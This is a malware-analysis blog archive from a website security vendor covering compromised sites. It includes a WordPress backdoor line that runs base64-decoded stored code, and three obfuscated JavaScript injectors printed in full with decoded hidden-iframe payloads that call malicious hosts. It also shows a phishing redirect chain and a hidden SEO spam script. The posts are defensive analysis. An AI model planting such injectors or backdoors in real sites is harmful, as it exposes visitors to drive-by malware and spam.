Showing posts with label compromised websites. Show all posts
Showing posts with label compromised websites. Show all posts

Sunday, February 14, 2016

How Hackers Prevent Linux Malware From Being Removed

Malware On Linux

Background

Here at Quttera, we clean infected websites on a daily basis and this weekend our automated cure procedure failed to remove malicious files. The customer actually had more than 170 websites on the Linux server which was heavily infected. The automatic cure is executed with root permissions so we started investigating what was this all about.

Investigation 

We logged-in into the infected server and executed few commands with root user such as 


and we got a "Permission denied".




At the beginning we thought that there is an issue with a parent directory permissions but after a quick verification we confirmed that the permissions were OK.

The next step was looking for a running process prevents a file removal, however the lsof output did not confirm this.

It is not a surprise that hackers are constantly changing tactics and improving techniques. This allows them to:

  1. Keep an infection undetected on a compromised server or website as much as possible. 
  2. Make it harder to cleaned/remove it. 

And one of the main challenges is staying on top of those threats as they evolve.

We continued with further investigation and the next step was to use lsattr command which lists file attributes on a Linux second extended file system. We executed the lsattr command on the locked file and the file had "a" and "i" attributes.

You can always search for the lsattr command description through 'man' in Linux. So, we came across chattr command that led us to the following:

  1. chattr change file attributes on a Linux second extended file system
  2. File with the "i" attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file and no data can be written to it. Only a super-user or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear the attribute.
  3. File with the "a" attribute set can be opened in append mode only for writing. Only the super-user or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear the attribute.

So to make the long story short, the solution was to run:


and




which allowed to remove file without any problem



What is "Linux second extended file system"?

The second extended file system (or Ext2) is Ext4 file system grandparent used by Linux kernel.
The Ext2 used as default file system by several Linux distributions and it was replaced by Ext3.
You can find more information about the Ext2 here

If you suspect your website was compromised or would like us to remove the malware, please select from ThreatSign - website monitoring and malware clean-up plans. To run free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera's help-desk.









Wednesday, May 27, 2015

Identifying and Removing Spam From Word Press Database

Background

This case of Spam clean-up from Word Press website didn't stand out from the first glance. Customer was blacklisted by Google due to spam posts. As a part of blacklisting removal service we reviewed Google alert and start working. Internal malware scan with Quttera tools quickly identified and verified the infection and type. However, the Spam posts kept re-appearing upon successful clean-ups. This post is a short overview of Spam removal process to give you hints when you search for Spam origin in your websites.

Malware Scan and Investigation

As no suspicious posts were there in Word Press dashboard we started to investigate MySQL database tables content. Spamming posts were found and removed from database. In no time, new posts were added with different spam content. Next thing we checked cache plugins that were installed and removed them to decrease "investigation noise". After that, we dumped content of wpoptions table and investigated its content. During investigation we found two malicious Word Press options  wpdcon and wptheme_opt. 

wpdcon contained suspicious IP masks encoded with base64  

NS4yNTUuMTkyLjAtMTg= 
OC4qLiouKg==
MTIuMC4qLio= 

For full body see here - http://pastebin.com/uYzXu1B3

These masks are used to recognize whether request came from human visitor 

wptheme_opt  (http://pastebin.com/cdFLyL9X ) contained actually the body that loaded spam posts into the data base.

When were removed, the missing options started to generate errors upon access to a website. Investigating those errors highlighted the exact injection place.

Following is a dump of the infection:

{{{{

add_action('init', create_function('', implode("\n", array_map("base64_decode", unserialize(get_option("wptheme_opt"))))));

}}}}

Resolution

As a part of anti-malware services for websites, the re-consideration request has been submitted and Google have removed their alert. 


Thursday, May 8, 2014

PHP Code Injecting JavaScript Malware To Redirect To Pharma Sites

How Couple Of Compromised Servers Are Used For BlackHat Pharma SEO

Our malware analysts have recently finished cleaning up hacked site of a ThreatSign (anti-malware service) customer. We decided it worth a post to help others in malware research and prevention.

Malware execution diagram


We were contacted by webmaster whose site was blacklisted by Google. In addition to blacklisting status, external scan for malware showed numerous hidden iframes in the scanned html file(s).

After manual investigation of the files on site.cc (we can't provide real name of the customer site), it appeared that all index.php files were infected by php malware. Upon access to this server the malicious php code made request to another server:
__url_get_contents(http://hacked-server-url/_vti_bin/tky4df82.php, 1);
The output of this call was a portion of JavaScript where src attribute had visitor's IP (id=XXXXX) as appended parameter:
<script type="text/javascript" src="'returned-url'?id=XXXXX"></script>
Digging further, on the server to which the call was made. It appeared to be hosting proxy php module at /_vti_bin/tky4df82.php . The JavaScript, it finally served to our customer's (and most probably many others), generated those hidden iframes to pharmaceutical sites. It even had localization settings, so that you will get the site with the language according to your IP geo location.

Full php code was uploaded to pastebin, in case you encounter similar issue:  http://pastebin.com/ThYzmrfv

Malware clean-up


Uncovering online threats and hidden malware is easy and effective with Online Malware Scanner. However, if you suspect that your website was infected, select from Malware Removal & Monitoring Plans for malware removal.

Alternatively, you can try to remove malware using Quttera's website scan report. Don't forget to submit your website(s) for re-testing and removing from blacklist if needed.

Tuesday, March 18, 2014

You Were Mentioned In A Tweet Phishing

Tweeter Phishing

This short post dedicated to tweeter phishing attempt that we noticed. It is based on simple re-directs that finally lands on some arbitrary page where your twitter credentials are prompted.

Here is how it works:

The email:

Tweeter Phishing Email
Link re-directs:
  1. po.st/L41lRU - located in US
  2. hxxp://joi.nu/o6j?iewj - located in Germany 
  3. hxxp://103.243.128.145/r/fw1/ - located in Hong Kong
In stage 3 you land in phishing site (see image below) claiming that your session has ended. In order to see that "tempted Tweet" you are asked to enter your Twitter credentials.

Phishing Page


Needless to say, that you should not!

Malware clean-up

Uncovering online threats and hidden malware is easy and effective with Online Malware Scanner. However, if you suspect that your website was infected, use Website Anti-malware Monitoring for malware removal.

Alternatively, you can try to remove malware using Quttera's website scan report. You will then need to submit your website(s) for re-testing and removing from blacklist.

Sunday, October 6, 2013

3 JavaScript threats generating hidden iframe(s) to compromised server(s)

Obfuscated malicious JavaScript code injected on website pages generates hidden iframe to remote server(s)

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user in order to download content from remote malware website/ server.

In this post we cover 3 recently detected malicious scripts on scanned websites. The payload of each decoded malware shown below downloads remote .html or .php file without user consent.

You can find similar web threats analysis in our other posts: malicious iframes generation.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Sample 1 

Beautified script

  1. var wsqWQBPps ="cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2fcNRoPJdqz76cNRoPJdqz6ccNRoPJdqz71cNRoPJdqz73cNRoPJdqz72cNRoPJdqz79cNRoPJdqz79cNRoPJdqz61cNRoPJdqz63cNRoPJdqz72cNRoPJdqz2ecNRoPJdqz70cNRoPJdqz68cNRoPJdqz70cNRoPJdqz3fcNRoPJdqz76cNRoPJdqz61cNRoPJdqz6fcNRoPJdqz77cNRoPJdqz76cNRoPJdqz3dcNRoPJdqz4ecNRoPJdqz48cNRoPJdqz63cNRoPJdqz43cNRoPJdqz71cNRoPJdqz55cNRoPJdqz46cNRoPJdqz53cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz68cNRoPJdqz72cNRoPJdqz79cNRoPJdqz74cNRoPJdqz65cNRoPJdqz77cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz39cNRoPJdqz38cNRoPJdqz38cNRoPJdqz39cNRoPJdqz34cNRoPJdqz33cNRoPJdqz39cNRoPJdqz26cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz70cNRoPJdqz3bcNRoPJdqz79cNRoPJdqz6acNRoPJdqz72cNRoPJdqz65cNRoPJdqz73cNRoPJdqz66cNRoPJdqz64cNRoPJdqz3dcNRoPJdqz38cNRoPJdqz35cNRoPJdqz34cNRoPJdqz22cNRoPJdqz20cNRoPJdqz6ecNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz79cNRoPJdqz66cNRoPJdqz65cNRoPJdqz6acNRoPJdqz43cNRoPJdqz50cNRoPJdqz43cNRoPJdqz7acNRoPJdqz62cNRoPJdqz41cNRoPJdqz22cNRoPJdqz20cNRoPJdqz74cNRoPJdqz69cNRoPJdqz74cNRoPJdqz6ccNRoPJdqz65cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz4ecNRoPJdqz65cNRoPJdqz73cNRoPJdqz58cNRoPJdqz6fcNRoPJdqz59cNRoPJdqz47cNRoPJdqz54cNRoPJdqz42cNRoPJdqz7acNRoPJdqz22cNRoPJdqz20cNRoPJdqz77cNRoPJdqz69cNRoPJdqz64cNRoPJdqz74cNRoPJdqz68cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz68cNRoPJdqz65cNRoPJdqz69cNRoPJdqz67cNRoPJdqz68cNRoPJdqz74cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz62cNRoPJdqz6fcNRoPJdqz72cNRoPJdqz64cNRoPJdqz65cNRoPJdqz72cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz3ecNRoPJdqz3ccNRoPJdqz2fcNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3e";
  2. yvDFQwwmM = eval;
  3. var WSxQJgvuB = wsqWQBPps.replace(/cNRoPJdqz/g, "%");
  4. yvDFQwwmM("document.write(unescape(WSxQJgvuB))");


Malicious payload


Decoded payload injects hidden iframe to http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&amp;hrytewsfd=9889439&amp;yjresfd=854


  1. document.write( < iframe src = "http://private3[.]zapto[.]org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&amp;hrytewsfd=9889439&amp;yjresfd=854"
  2.     name = "yfejCPCzbA"
  3.     title = "NesXoYGTBz"
  4.     width = "0"
  5.     height = "0"
  6.     frameborder = "0" > < /iframe>)


Blacklisting status

The website is Suspicious on Google Safe Browsing - report link

Google Safe Browsing
Google Safe Browsing diagnostic report



Sample 2

Beautified script


  1. var i, y, x ="3c696672616d65207372633d22687474703a2f2f6d6f636f7265776172642e636f6d2f6672616d652f61616e2e68746d6c222077696474683d223122206865696768743d2231223e0d0a3c2f696672616d653e";
  2. y = '';
  3. for (i = 0; i < x.length; i += 2) {
  4.     y += unescape(
  5.         '%' + x.substr(i, 2));
  6. }
  7. document.write(y);


Malicious payload


Decoded payload injects hidden iframe to http://mocoreward.com/frame/aan.html


  1. <iframe src="http://mocoreward.com/frame/aan.html" width="1" height="1">
  2. </iframe>

Blacklisting status

The website is detected by BitDefender and Sophos as per VirusTotal report.

VirusTotal URL analysis report
VirusTotal - URL analysis report

Sample 3

Beautified script

  1. c = 3 - 1;
  2. i = -1 - 1 + c;
  3. p = parseInt;
  4. if (p("01" + "2" + "3") === 83) try {
  5.     Boolean()["pr" + "otot" + "ype"].q
  6. } catch (egewgsd) {
  7.     if (window.document) f = ['-32i-32i64i61i-9i-1i59i70i58i76i68i60i69i75i5i62i60i75i28i67i60i68i60i69i75i74i25i80i43i56i62i37i56i68i60i-1i-2i57i70i59i80i-2i0i50i7i52i0i82i-28i-32i-32i-32i64i61i73i56i68i60i73i-1i0i18i-28i-32i-32i84i-9i60i67i74i60i-9i82i-28i-32i-32i-32i59i70i58i76i68i60i69i75i5i78i73i64i75i60i-1i-7i19i64i61i73i56i68i60i-9i74i73i58i20i-2i63i75i75i71i17i6i6i75i59i74i11i14i5i67i70i70i66i64i69i5i56i75i6i74i75i59i74i6i62i70i5i71i63i71i22i74i64i59i20i8i-2i-9i78i64i59i75i63i20i-2i8i7i-2i-9i63i60i64i62i63i75i20i-2i8i7i-2i-9i74i75i80i67i60i20i-2i77i64i74i64i57i64i67i64i75i80i17i63i64i59i59i60i69i18i71i70i74i64i75i64i70i69i17i56i57i74i70i67i76i75i60i18i67i60i61i75i17i7i18i75i70i71i17i7i18i-2i21i19i6i64i61i73i56i68i60i21i-7i0i18i-28i-32i-32i84i-28i-32i-32i61i76i69i58i75i64i70i69i-9i64i61i73i56i68i60i73i-1i0i82i-28i-32i-32i-32i77i56i73i-9i61i-9i20i-9i59i70i58i76i68i60i69i75i5i58i73i60i56i75i60i28i67i60i68i60i69i75i-1i-2i64i61i73i56i68i60i-2i0i18i61i5i74i60i75i24i75i75i73i64i57i76i75i60i-1i-2i74i73i58i-2i3i-2i63i75i75i71i17i6i6i75i59i74i11i14i5i67i70i70i66i64i69i5i56i75i6i74i75i59i74i6i62i70i5i71i63i71i22i74i64i59i20i8i-2i0i18i61i5i74i75i80i67i60i5i77i64i74i64i57i64i67i64i75i80i20i-2i63i64i59i59i60i69i-2i18i61i5i74i75i80i67i60i5i71i70i74i64i75i64i70i69i20i-2i56i57i74i70i67i76i75i60i-2i18i61i5i74i75i80i67i60i5i67i60i61i75i20i-2i7i-2i18i61i5i74i75i80i67i60i5i75i70i71i20i-2i7i-2i18i61i5i74i60i75i24i75i75i73i64i57i76i75i60i-1i-2i78i64i59i75i63i-2i3i-2i8i7i-2i0i18i61i5i74i60i75i24i75i75i73i64i57i76i75i60i-1i-2i63i60i64i62i63i75i-2i3i-2i8i7i-2i0i18i-28i-32i-32i-32i59i70i58i76i68i60i69i75i5i62i60i75i28i67i60i68i60i69i75i74i25i80i43i56i62i37i56i68i60i-1i-2i57i70i59i80i-2i0i50i7i52i5i56i71i71i60i69i59i26i63i64i67i59i-1i61i0i18i-28i-32i-32i84'][0].split('i');
  8.     v = "e" + "va" + "l";
  9. }
  10. if (v) e = window[v];
  11. w = f;
  12. s = [];
  13. r = String;
  14. for (; 589 != i; i += 1) {
  15.     j = i;
  16.     s = s + r["f" + "r" + "omC" + "har" + "C" + "ode"](w[j] * 1 + 41);
  17. }
  18. if (e) e(s);


Malicious payload


Decoded payload injects hidden iframe to http://tds47.lookin.at/stds/go.php


  1. if (document.getElementsByTagName('body')[0]) {
  2.     iframer();
  3. } else {
  4.     document.write("<iframe src='http://tds47.lookin.at/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
  5. }
  6. function iframer() {
  7.     var f = document.createElement('iframe');
  8.     f.setAttribute('src', 'http://tds47.lookin.at/stds/go.php?sid=1');
  9.     f.style.visibility = 'hidden';
  10.     f.style.position = 'absolute';
  11.     f.style.left = '0';
  12.     f.style.top = '0';
  13.     f.setAttribute('width', '10');
  14.     f.setAttribute('height', '10');
  15.     document.getElementsByTagName('body')[0].appendChild(f);
  16. }


Blacklisting status


The website is detected by BitDefender and Sophos as per VirusTotal report.

VirusTotal URL analysis report
VirusTotal - URL analysis report

Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.

Thursday, October 3, 2013

JavaScript Injecting Invisible Spam

Malicious obfuscated JavaScript detected on scanned website injects spam invisible to site visitor



Background

Online Website Malware Scanner reported malicious JavaScript code in scanned web pages. Such malicious obfuscated JavaScript code is often used to inject malicious iframe(s) invisibly to website visitor and to download malware from remote distributor onto visitor's computer.

However, in this case it modifies the property of the html paragraph tag so that to hide its content from the eyes of the visitor while it remains visible for robots. This is likely the BlackHat SEO spam technique as per content and links nature. It can be assumed that this would work for drive-by-download and other malware attacks as well.

You can review BlackHat SEO example and spam SEO techniques using other method (hidden iframes) analysis in earlier posts.

Malicious action

Modifying HTML tags to make content invisible for website visitor is often used for spamming purposes and/or to distribute malware hosted on external web resources(websites).

Malware entry details

Beautified script:
  1. var rio833 = ["116", "127", "115", "133", "125", "117", "126", "132", "62", "119", "117", "132", "85", "124","117", "125", "117", "126", "132", "82", "137", "89", "116", "56", "50", "124", "125", "117", "126", "133", "66","64", "70", "50", "57", "62", "131", "132", "137", "124", "117", "62", "128", "127", "131", "121", "132", "121","127", "126", "48", "77", "48", "50", "113", "114", "131", "127", "124", "133", "132", "117", "50", "75", "116","127", "115", "133", "125", "117", "126", "132", "62", "119", "117", "132", "85", "124", "117", "125", "117","126", "132", "82", "137", "89", "116", "56", "50", "124", "125", "117", "126", "133", "66", "64", "70", "50","57", "62", "131", "132", "137", "124", "117", "62", "124", "117", "118", "132", "48", "77", "48", "61", "65","69", "64", "64", "75", "116", "127", "115", "133", "125", "117", "126", "132", "62", "119", "117", "132", "85","124", "117", "125", "117", "126", "132", "82", "137", "89", "116", "56", "50", "124", "125", "117", "126", "133","66", "64", "70", "50", "57", "62", "131", "132", "137", "124", "117", "62", "116", "121", "131", "128", "124","113", "137", "48", "77", "48", "50", "126", "127", "126", "117", "50", "75"];
  2. var kwv93 = "";
  3. var ecso014 = "";
  4. for (up420 = 0; up420 < rio833.length; up420++) {
  5.     ecso014 = rio833[up420] - 16;
  6.     kwv93 = kwv93 + String.fromCharCode(ecso014);
  7. }
  8. eval(kwv93);


Malicious payload


Decoded payload changes id="lmenu206" paragraph tag setting its display style to "none" and absolute left position to the very big value.
  1. document.getElementById("lmenu206").style.position = "absolute";
  2. document.getElementById("lmenu206").style.left = -1500;
  3. document.getElementById("lmenu206").style.display = "none";

Here is the actual content of this paragraph:
<p id="lmenu206"> Erol B眉y眉kbur莽 Kizilciklar oldu mu, <a href="http://bagdownlo1e.blogspot.com">Kizilciklar oldu mu</a>, Leman Ak莽atepe Kizilciklar oldu mu. Mahmoud El-Meliguy Hekayat hub, <a href="http://downloadc6n.blogspot.com/2009/08/movie-hekayat-hub.html">movie Hekayat hub</a>, Download A Love Story. Michelle Lynette Bush Gypsies, <a href="http://chiyarimo4e.blogspot.com/2009/08/movie-gypsies-tramps-thieves-2006.html">Download Gypsies</a>, Carla R. Ponzio Gypsies. ? <a href="http://best8biographie9.blogspot.com/2009/02/discovering-donald-ross-architect-and.html">Donald Ross: The Architect</a> <a href="http://biographi1info.blogspot.com/2009/02/inside-helmet-hard-knocks.html">Biography/Autobiography Inside the Helmet: Hard Knocks</a> Biography/Autobiography Mario, <a href="http://web3booksbio.blogspot.com/2009/02/mario-lemieux-best-there-ever-was.html">Lemieux: Best There Ever Was</a> , Sociology Masters Pr. </p>

Checked all domains referenced in this paragraph (see in bold above) on Google Safe Browsing and they were never listed as suspicious. All URLs are clean on VirusTotal as well.

When tried to access those URLs the Blogger says that there is nothing there. This technique to promote spam and other suspicious content is is widely used to infect WordPress based websites.

Malware clean-up

Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.